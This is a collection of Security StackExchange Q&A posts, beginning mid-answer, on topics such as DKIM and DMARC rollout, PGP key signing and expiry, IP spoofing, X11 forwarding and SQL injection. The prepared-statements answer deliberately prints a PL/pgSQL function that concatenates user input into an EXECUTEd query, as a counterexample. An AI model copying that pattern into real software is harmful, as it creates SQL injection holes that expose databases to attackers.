even using SSL. In counterpart, if you did assume that this warrants the use of SSL (because it might be harder to look into what the processes actually do rather than just looking at the network, even if you have root control on the machine), this would mean you would also want to turn for localhost communications (e.g. if you have other services on your web server, or in the situation where both DB server and web server were on the same machine). It's not necessarily a bad thing to be over-cautious, but you have to put your question in the context of what attackers could also do should they be in a position to perform an attack against what the security measure (SSL) protects you against, and whether this security measure would prevent them from achieving their goal anyway, once in this position. I think the window is actually quite narrow there (assuming your back-end network really is secured, physically, not just by some firewall amongst a number of machines). | {
"source": [
"https://security.stackexchange.com/questions/14334",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3537/"
]
} |
14,352 | Is it OK if I sign a subset of domain emails, or is this an all-or-nothing game? We use Amazon's Simple-Email-Service for sending e-commerce emails. We would like to sign these with DKIM . This same domain is also used for all email addresses for the corporation behind this e-commerce operation. Due to some IT constraints, it does not look like we'll be able to sign the employee emails for many months to come. Do spam protection servers look at the domain and see a DKIM public key and say, "OK, all emails must be signed", or do they look email-by-email and, if a signature is found, then they go looking for the public key? | DKIM doesn't tell you anything about whether a message is spam or not (although it's a bit more work to set up, there's plenty of spam that is signed with a valid DKIM signature). DKIM is all about identity - do I know that this message is from the specified sender (and that it hasn't been altered in any meaningful way)? No good anti-spam service will reject a message solely based on a lack of a DKIM signature. If there is an invalid signature, then that's something to consider (i.e. maybe this is phishing); however, it's risky to reject in this case (because signatures can get broken in transit), and most anti-spam filters will not do that (at least by default). The use of DKIM (without anything else) is to allow the mail client to indicate to the user that the message sender is verified (much as browsers indicate to the user that traffic is sent over SSL, or that a certificate is trusted). So, the simple answer is yes , it is useful to sign messages, even if you cannot sign them all. You can't tell your users that they should only trust messages that are signed, but they can at least trust some of them. (Unfortunately, not a lot of mail clients yet expose this information, and users aren't yet trained to look for it, so the benefits aren't large - yet). The simple answer to the second question is no , any decent spam filter will ignore the lack of a DKIM signature. Further to this, there are two ways you can extend your use of DKIM, that do have an impact when only some messages are signed. Author Domain Signing Practices (ADSP) is an optional extension to DKIM where you specify what should happen to unsigned messages. Specifically, you can select from three choices: unknown (this the behaviour you get if you don't use ADSP) - the domain signs some or all mail (or none, I suppose, although it would be then odd to have the record set up) all - the domain signs all mail. The recipient (or their anti-spam filter) gets to choose what to do with messages that don't have a valid signature; commonly these would be put into some sort of quarantine or flagged in some way so that the user is aware that they are probably fraudulent. discardable - the domain signs all mail, and is instructing the recipient (or their anti-spam filter) to silently discard any messages that don't have a valid signature. This is the same as "all", except that the sender , rather than the recipient , makes the decision about what to do with messages without a valid signature. Anti-spam (or anti-phishing, in this case) filters don't have to obey an ADSP instruction, but they are likely to. So right now, you should either ensure that you don't have an ADSP record, or that if you do it is set to "unknown". Once you are able to sign all messages, you could move to "all" or "discardable", depending on what behaviour you would like. Similar (but newer) to ADSP is Domain-based Message Authentication, Reporting & Conformance (DMARC). DMARC incorporates policies for both SPF failures and DKIM failures, and incorporates information about providing feedback (to the supposed sender domain) about failures. You've got basically the same choices as with ADSP, but more flexibility about how to work. The example the specification provides as to how you'd start using DKIM/SPF is roughly this: Deploy DKIM and SPF. Publish a DMARC policy of "none" with a feedback reporting address (this is like ADSP's "unknown", except that you also state that you want feedback about failures, so if they are really from you, you can figure out how to fix the problem). Tune your DKIM/SPF use until the feedback reports indicate that all your mail is appropriately authenticated. Increase the DMARC policy strength to "quarantine" for a small percentage (this instructs the receiver to quarantine any messages that don't meet the policy, but only for a randomly selected percentage of mail). Gradually increase the percentage (to 100%) as you get more confident that all mail is appropriately authenticated. Set a DMARC policy of "reject" (again with a small percentage to start with, building over time to 100%), so that rather than quarantining, messages that don't meet the policy are simply rejected. DMARC is new, so only a few anti-spam filters are using it at present, but that will (probably) increase over time, and there's little cost in adopting it now. If you choose to use DMARC, then right now you could get to step 2, and then continue through the steps as you manage to get all mail signed. | {
"source": [
"https://security.stackexchange.com/questions/14352",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9458/"
]
} |
14,479 | What exactly does the "key signing" mean? So for example I have a private/public GPG key so that people could send me encrypted e-mail, because they know my public key. But: what does key signing mean in this example? E.g.: "a third person signs my public key (how?)." And the most important: Where can other people see that my key is signed by others? | OK, as you say, you have a private/public pair key so I can send you encrypted e-mail, because I know your public key. But how do I know your public key? Obviously, because you told me what it was, and if you told me over a secure channel - for example you wrote it on a piece of paper and handed it to me in private - then that's fine. But if you emailed it to me over an insecure channel how can I know that Eve didn't intercept your email and replace your key with hers? Then Eve could read my encrypted email, because I'd have encrypted it with her key. This is a real problem because if we've only got the Internet as our communications channel then by definition it's not secure to use for exchanging keys. It can't be, because we haven't exchanged keys yet . One way round this is to involve a third party who we both trust. Let's call him Bob. Bob has a lot of secure channels to people. He has one to me and so I know his public key. He has one to you, and Bob knows your public key. What Bob can do is take your public key, and encrypt the message "Lance's public key is 18348273847473436" with his private key. He then gives that encrypted message to you. Bob has signed your key. Now, if you want to send me your public key, you just send me the signed key over the insecure channel. I know it came from you, not Eve, because I can decrypt it with Bob's public key, and I trust Bob. So, we've turned the problem of "Graham and Lance need a secure channel between them" into the problem of "Graham needs a secure channel to Bob" and "Lance needs a secure channel to Bob". It doesn't sound like we've made things better, until you realise that now instead of worrying about arranging secure channels to D.W. and Lucas and Schroeder and Thomas and Rory and Graham and everyone else on the Internet, you just need to worry about getting a secure channel to Bob, once. | {
"source": [
"https://security.stackexchange.com/questions/14479",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2212/"
]
} |
14,505 | As far as I've understood, if you try to issue a HTTP request with a spoofed IP address, then the TCP handshake fails, so it's not possible to complete the HTTP request, because the SYN/ACK from the server doesn't reach the evil client ... ... in most cases . But let's now mostly disregard these four cases: - Man in the middle (MITM) attacks - The case when the evil client controls the network of the Web server - The case when the evil client fakes another IP on its own local network - BGP attacks Then I can indeed trust the IP address of a HTTP request? Background: I'm thinking about building a map of IP addresses and resource usage, and block IP addresses that consume too much resources. But I'm wondering if there is, for example, some way to fake an infinit number of IP addresses (by issuing successful HTTP requests with faked IPs), so that the Web server's resource-usage-by-IP-buffers grows huge and causes out-of-memory errors. (Hmm, perhaps an evil Internet router could fake very many requests. But they aren't evil are they. (This would be a MITM attack? That's why I said mostly disregard, above)) | Yes (with your assumptions of neglecting the client being able to intercept the return of the handshake at a spoofed IP) if you do things correctly. HTTP requests are done over TCP; until the handshake is completed the web server doesn't start processing the HTTP request. Granted a random user could attempt to spoof the end of a handshake; but as they have to guess the server generated ACK, they should only have a 1 in 2^32 (~4 billion) chance of doing it successfully each time. As Ladadadada commented make sure you aren't picking up the wrong value of the remote IP address in your web application. You want the IP address from the IP datagram header (specifically, the source IP address). You do not want values like X-Forwarded-For / X-Real-IP that can be trivially forged as they are set in the HTTP header. Definitely test by trying to spoof some IP addresses; with say a browser plugin or manually with telnet yourserver.com 80 . The purpose of these fields is so web proxies (that may say cache content to serve it faster) can communicate to webservers the user's real IP address rather than the proxies IP address (which may be for hundreds of users). However, since anyone can set this field it should not be trusted. | {
"source": [
"https://security.stackexchange.com/questions/14505",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9487/"
]
} |
14,718 | I've created a new OpenPGP key to sign a software package in a source repository with an expiration date three years from now. It seemed like a good security measure, because if the key is compromised or stolen the damage will be limited. But then I thought about the day when I will need to sign my new key. Signing the new key with the old key seems equivalent to keeping the old key, and thus adds nothing to security. Does setting an expiration date improve key security? If so, what's the best expiration/key replacement policy? | tl;dr : the expiry date is no reasonable mechanism to protect the primary key, and you should have a revocation certificate at hand. The slightly longer version is, that the effect of the expiration date differs between primary and subkeys, and also what you aim to prevent. Subkeys For subkeys, the effect is rather simple: after a given time frame, the subkey will expire. This expiry date can only be changed using the primary key. If an attacker gets hold of your subkey (and only this), it will automatically be inactivated after the expiry date. The expiry date of a subkey is a great tool to announce you switch your subkeys on a regular base, and that it's time for others to update your key after a given time. Primary Keys For primary keys, the situation is different. If you have access to the private key, you can change the expiry date as you wish . This means, if an attacker gets access to your private key, he can extend the validity period arbitrarily. Worst case, you lose access to the private key at the same time, then even you cannot revoke the public key any more (you do have a printed or otherwise offline and safely stored revocation certificate, do you?). An expiry date might help in the case you just lose control over the key (while no attacker has control over it). The key will automatically expire after a given time, so there wouldn't be an unusable key with your name on it sitting forever on the key servers. Recovering Weak Unrevoked Keys Even worse, expiry dates might provide a false sense of security. The key on the key servers expired, so why bother to revoke it? There is a large number of well-connected RSA 512 bit keys on the key server network, and probably a comparabily large number of weak DSA keys (because of the Debian RNG problems). With faster processors and possibly new knowledge on algorithm weaknesses, an attacker might in future be able to crack the expired, but non-revoked key and use it! Keeping a Revocation Certificate Safe Instead If you've got a revocation certificate and are sure you never might lose access to both your private key and revocation certificate at the same time (consider fire, (physical) theft, official institutions searching your house), there is absolutely no use in setting an expiry date apart from possible confusion and more work extending it. | {
"source": [
"https://security.stackexchange.com/questions/14718",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7952/"
]
} |
14,731 | What is the difference between ECDHE-RSA and DHE-RSA? I know that DHE-RSA is (in one sentence) Diffie Hellman signed using RSA keys. Where DH is used for forward secrecy and RSA guards against MITM, but where do the elliptic curves in ECDHE-RSA are exactly used? What upsides has ECDHE-RSA over DHE-RSA? | ECDHE suites use elliptic curve diffie-hellman key exchange, where DHE suites use normal diffie-hellman. This exchange is signed with RSA, in the same way in both cases. The main advantage of ECDHE is that it is significantly faster than DHE. This blog article talks a bit about the performance of ECDHE vs. DHE in the context of SSL. | {
"source": [
"https://security.stackexchange.com/questions/14731",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3306/"
]
} |
14,794 | Can my email account be accessed without the password, and how secure is email if I store my personal documents on it? And how come Yahoo Mail asks me to tell them my friends and folders names to give it back to me after being stolen? | Typically, your email provider (Yahoo, for example) can read everything in your email without knowing your password. And they will, as required by law and potentially in other circumstances, provide copies to Law Enforcement and Government. It is also possible that an attacker could compromise Yahoo's servers and access your email that way. And an attacker might be able to get hold of your password in various ways, in which case the attacker can gain access to your email. Or, an attacker might be able to guess the answers to your security questions, which also is sufficient for the attacker to gain access to your email account. Lastly, it's important to mention that emails are not just documents on your email server; they're also on the email server of the person who sent it to you, and maybe cached on your client, and maybe on their client, and backed up in various places, and they travel over the network. Lots of copies mean lots of places where an attacker can get hold of a copy. (Your question hints that you might just be storing documents in email without sending them, in which case this is less of an issue.) Now, all this sounds very scary, but it's important in security to understand the level of risk and what your risk appetite is. Nothing is 100% secure - so you have to ask yourself:
- How valuable is this data to me? What will it cost me if there is a breach?
- What kind of attacker might try and get it? What resources and capabilities do they have? If the data is not very valuable, and anyone who is likely to want it is not very capable, then you don't need a lot of security. I'm not sure this is very practical, so here's some simple tips will help you improve the security of your stored email: Choose a good password - not in a dictionary, not a name or a date, as long as possible, with a mixture of lowercase, upper case, symbols. Don't use that same password anywhere else; don't write it down or tell anyone, and use something random that isn't connected to you. Be careful about your answers to security questions, to make sure that no one will be able to guess them. If it looks like someone might be able to guess one of the answers to one of your security questions, you could consider lying (pick a random answer that will be unguessable), and write it down somewhere in case you ever need it. Consider encrypting the documents (with a different password to the one used for your email). There are lots of good tools for this: I like http://www.sophos.com/en-us/products/free-tools/sophos-free-encryption.aspx . Don't rely on built-in passwords in Word or WinZip, use a dedicated encryption tool. | {
"source": [
"https://security.stackexchange.com/questions/14794",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8780/"
]
} |
14,802 | Now that the ICANN is allowing custom Top Level Domain names and often corporate IT workers like to use .local as the TLD for internal networks , if someone does buy the .local TLD what are some possible dangers a user could encounter? The main example I can think of is spear-phishing attacks. If a company has computers like SuperSecureServer.local on their LAN and a malicious attacker makes TotallyARealCorporateServer.local would TotallyARealCorporateServer.local resolve to the attackers IP? If it did, the attacker could send a bad link then could impersonate a real server and get domain login credentials. | To answer your specific question, .local has already been reserved by ICANN as an internal gTLD. Please see section 2.2.1.2.1 "Reserved Names" in the ICANN Applicant Guidebook . The full list of reserved gTLDs are: AFRINIC IANA-SERVERS NRO ALAC ICANN RFC-EDITOR APNIC IESG RIPE ARIN
IETF ROOT-SERVERS ASO INTERNIC RSSAC CCNSO INVALID SSAC EXAMPLE* IRTF
TEST* GAC ISTF TLD GNSO LACNIC WHOIS GTLD-SERVERS LOCAL WWW IAB
LOCALHOST IANA NIC
*Note that in addition to the above strings, ICANN will reserve translations of the terms
"test" and "example" in multiple languages. The remainder of the strings are reserved
only in the form included above (There is an addendum to the above to state that "similarity" metrics are applied to make sure that gTLDs like .1ocal are not abused, either.) | {
"source": [
"https://security.stackexchange.com/questions/14802",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2221/"
]
} |
14,815 | What are some of the security concerns and reasons either for or against allowing X11 Forwarding. I have generally taken an approach of not allowing it under the blanket guise of security. Recently, I had a user indicated that they thought that the security implications of resulting from allowing X11 Forwarded sessions were negligible. I was curious to learn more about what the harm is in allowing X11 Forwarding and why one might want to allow it. | The implication of X11 forwarding is that it opens a channel from the server back to the client. In a simple SSH session, the client is more trusted than the server: anyone in control of the client can run commands on the server (assuming shell access), but the converse is not true. With X11 forwarding, the server is likely to gain shell access to the client. In a text session, there is a limited channel from the server back to the client: the server determines the output that is displayed on the client, and can in particular try to exploit escape sequences in the terminal running on the client, In an X11 session, the server can send X11 commands back to the client. X11 was not designed with security in mind, it was designed with the idea that all programs that you're displaying are run by you and hence trusted anyway. By default, SSH subjects commands from the server to restrictions through the X11 SECURITY extension . The SECURITY extension disables some obvious attacks such as keyboard grabs and key injection, but allows others like focus stealing. | {
"source": [
"https://security.stackexchange.com/questions/14815",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1937/"
]
} |
14,916 | I'm new to commercial SSL certificates and would like to know if a CSR that I generate is safe to send via email? | Sure but I don't think that the certificate authority should receive CSRs by email unless they are employing a mechanism (like signing your email with PGP/GPG) to ensure that the CSR came from you (rather than someone pretending to be you). | {
"source": [
"https://security.stackexchange.com/questions/14916",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9701/"
]
} |
14,967 | I need to convince my internal IT department to give my new team of developers admin rights to our own PCs. They seem to think this will create some security risk to the network. Can anyone explain why this would be? What are the risks? What do IT departments usually set up for developers who need ability to install software on their PCs. This question was IT Security Question of the Week . Read the June 8, 2012 blog entry for more details or submit your own Question of the Week. | At every place I have worked (as a contract developer) developers are given local admin rights on their desktops. The reasons are: 1) Developers toolsets are often updated very regularly. Graphics libraries, code helpers, visual studio updates; they end up having updates coming out almost weekly that need to be installed. Desktop support usually gets very tired of getting 20 tickets every week to go install updated software on all the dev machines so they just give the devs admin rights to do it themselves. 2) Debugging / Testing tools sometimes need admin rights to be able to function. No admin access means developers can’t do their job of debugging code. Managers don't like that. 3) Developer tend to be more security conscious and so are less likely to run/install dangerous malware. Obviously, it still happens but all in all developers can usually be trusted to have higher level access to be able to do their work. | {
"source": [
"https://security.stackexchange.com/questions/14967",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9734/"
]
} |
15,040 | My workplace has a standard that plaintext passwords are not allowed in application configuration files. This makes enough sense on its face, in case someone gets access to the config files they don't automatically have access to all the privileges of that application. In some cases it's possible and obviously preferable to have access associated with the login or otherwise avoid having a password, such as in Windows Security for SQL Server authentication, or have it configured in a third party location, such as JDBC configuration in a J2EE environment, but this is not always possible. When I must have a password in a configuration file, what level of encryption should it carry? How do you deal with the fact that the encryption key for the password has to be either hard coded or stored in yet another config file? Should the encryption keys for password be human readable? | So the following was a bit too long for a comment... Perhaps taking one step back and comparing benefits of preventative and detective controls might help. Preventative controls include encryption but you could also encode the password to make it less obvious. This approach is meant to protect the password from accidental sharing (a b32 encoding would produce less meaningful characters (b32 produces longer string than b64). Such an approach just increases the difficulty of memorizing the random sequence of numbers as well as the method that should be used to decode the string. Base32/64 encoding is a simple way of protecting passwords that do not require additional logic to be built/maintained. The other approaches to preventative controls would likely use encryption. There are many different ways to protect the key. Without getting into the details or reiterating what D.W. already posted, you can layer detective controls to improve the security posture. For example, you can audit access to a file that contains the key. You can correlate events (such as restarting of server/service) with access to the key file. Any other access request (successful or not) to the key file could indicate abnormal activity. To get to your questions, here's my take: if you have to store password in a config file, I'd recommend at least encoding the password where possible. Encoding the password would reduce the chance that it's leaked in the event someone scrolls through the file, say with a vendor support rep watching. Encrypting the password is much safer, but that requires additional complexity. How to deal with the fact that a key has to be hard coded or stored in another file. Well, separating the encryption key in another file increases the difficulty for someone to view the key. For example, you can use access control to limit access to the key file but still maintain a more open ACL for the config file. Similarly, you can implement auditing for access to the key file, which you can use to correlate back to events that require use of key. Hard coding the key may be fine if you limit access to the binary. Careful encoding of password can easily be detected by running a "strings" against the binary. You can encode/encrypt the hard coded password (i.e. require a separate function (perhaps with auditing) when to decode the password, but that increases the complexity for the developer and admin (i.e. how does one change the key without rebuilding/recompiling the binary?). Should the encryption keys for password be human readable? It depends. There's only a limited number of ways to protect the key. An encryption key is usually seen as an alphanumeric string that's hard to commit to to memory. You can always encode/encrypt the key, but such methods doesn't deter someone that's smart enough to take a screen shot. However, you can use simple "keys" (more like passwords) as input to a key expansion function. In those instances, perhaps additional measures such as encoding adds some additional value relative to the cost of complexity. If anything, a good approach is to implement multiple layers of controls. Preventative controls are more difficult while detective controls are generally easier to implement. Separating key files could simplify the overall architecture and implementation of controls. Regardless of whether preventative or detective controls are used, enabling some auditing functions is a must along with review of audit logs. This way, should the improbable happen (access to key), you can take corrective action. | {
"source": [
"https://security.stackexchange.com/questions/15040",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1678/"
]
} |
15,076 | I have found out recently that the remote assistant software that we put in a smartphone we sell can be activated by us without user approval. We are not using this option, and it is probably there by mistake. But the people who are responsible for this system don't see it as a big deal. Because “We are not going to use it”… Am I wrong for going ballistic over it? What would you do about it if it was your workplace? This question was IT Security Question of the Week . Read the Jun 16, 2012 blog entry for more details or submit your own Question of the Week. | Just because they won't use it, doesn't mean someone else won't find it and use it. A backdoor is a built-in vulnerability and can be used by anyone. You should explain that doing something like this is very risky for your company. What happens when some malicious attacker finds this backdoor and uses it? This will cost your company a lot of time and money to fix. And what will your company say when people ask why the software contained that backdoor in the first place? The company's reputation might be damaged forever. The risk is certainly not worth having it in the code. | {
"source": [
"https://security.stackexchange.com/questions/15076",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9811/"
]
} |
15,214 | Are prepared statements actually 100% safe against SQL injection, assuming all user-provided parameters are passed as query bound parameters? Whenever I see people using the old mysql_ functions on StackOverflow (which is, sadly, way too frequently) I generally tell people that prepared statements are the Chuck Norris (or Jon Skeet) of SQL injection security measures. However, I've never actually seen any documentation that categorically states "this is 100% safe" . My understanding of them is that they separate the query language and parameters all the way to the front door of the server, which then treats them as separate entities. Am I correct in this assumption? | Guarantee of 100% safe from SQL injection? Not going to get it (from me). In principle, your database (or library in your language that is interacting with the db) could implement prepared statements with bound parameters in an unsafe way susceptible to some sort of advanced attack, say exploiting buffer overflows or having null-terminating characters in user-provided strings, etc. (You could argue that these types of attacks should not be called SQL injection as they are fundamentally different; but that's just semantics). I have never heard of any of these attacks on prepared statements on real databases in the field and strongly suggest using bound parameters to prevent SQL injection. Without bound parameters or input sanitation, its trivial to do SQL injection. With only input sanitation, its quite often possible to find an obscure loophole around the sanitation. With bound parameters, your SQL query execution plan is figured out ahead of time without relying on user input, which should make SQL injection not possible (as any inserted quotes, comment symbols, etc are only inserted within the already compiled SQL statement). The only argument against using prepared statements is you want your database to optimize your execution plans depending on the actual query. Most databases when given the full query are smart enough to do an optimal execution plan; e.g., if the query returns a large percentage of the table, it would want to walk through the entire table to find matches; while if its only going to get a few records you may do an index based search [1] . EDIT: Responding to two criticisms (that are a tad too long for comments): First, as others noted yes every relational database supporting prepared statements and bound parameters doesn't necessarily pre-compile the prepared statement without looking at the value of the bound parameters. Many databases customarily do this, but its also possible for databases to look at the values of the bound parameters when figuring out the execution plan. This isn't a problem, as the structure of the prepared statement with separated bound parameters, makes it easy for the database to cleanly differentiate the SQL statement (including SQL keywords) from data in bound parameters (where nothing in a bound parameter will be interpreted as an SQL keyword). This is not possible when constructing SQL statements from string concatenation where variables and SQL keywords would get intermixed. Second, as the other answer points out, using bound parameters when calling an SQL statement at one point in a program will safely prevent SQL injection when making that top-level call. However, if you have SQL injection vulnerabilities elsewhere in the application (e.g., in user-defined functions you stored and run in your database that you unsafely wrote to construct SQL queries by string concatenation). For example, if in your application you wrote pseudo-code like: sql_stmt = "SELECT create_new_user(?, ?)"
params = (email_str, hashed_pw_str)
db_conn.execute_with_params(sql_stmt, params) There can be no SQL injection when running this SQL statement at the application level. However if the user-defined database function was written unsafely (using PL/pgSQL syntax): CREATE FUNCTION create_new_user(email_str, hashed_pw_str) RETURNS VOID AS
$$
DECLARE
sql_str TEXT;
BEGIN
sql_str := 'INSERT INTO users VALUES (' || email_str || ', ' || hashed_pw_str || ');'
EXECUTE sql_str;
END;
$$
LANGUAGE plpgsql; then you would be vulnerable to SQL injection attacks, because it executes an SQL statement constructed via string concatenation that mixes the SQL statement with strings containing the values of user defined variables. That said unless you were trying to be unsafe (constructing SQL statements via string concatenation), it would be more natural to write the user-defined in a safe way like: CREATE FUNCTION create_new_user(email_str, hashed_pw_str) RETURNS VOID AS
$$
BEGIN
INSERT INTO users VALUES (email_str, hashed_pw_str);
END;
$$
LANGUAGE plpgsql; Further, if you really felt the need to compose an SQL statement from a string in a user defined function, you can still separate data variables from the SQL statement in the same way as stored_procedures/bound parameters even within a user defined function. For example in PL/pgSQL : CREATE FUNCTION create_new_user(email_str, hashed_pw_str) RETURNS VOID AS
$$
DECLARE
sql_str TEXT;
BEGIN
sql_str := 'INSERT INTO users VALUES($1, $2)'
EXECUTE sql_str USING email_str, hashed_pw_str;
END;
$$
LANGUAGE plpgsql; So using prepared statements is safe from SQL injection, as long as you aren't just doing unsafe things elsewhere (that is constructing SQL statements by string concatenation). | {
"source": [
"https://security.stackexchange.com/questions/15214",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5400/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.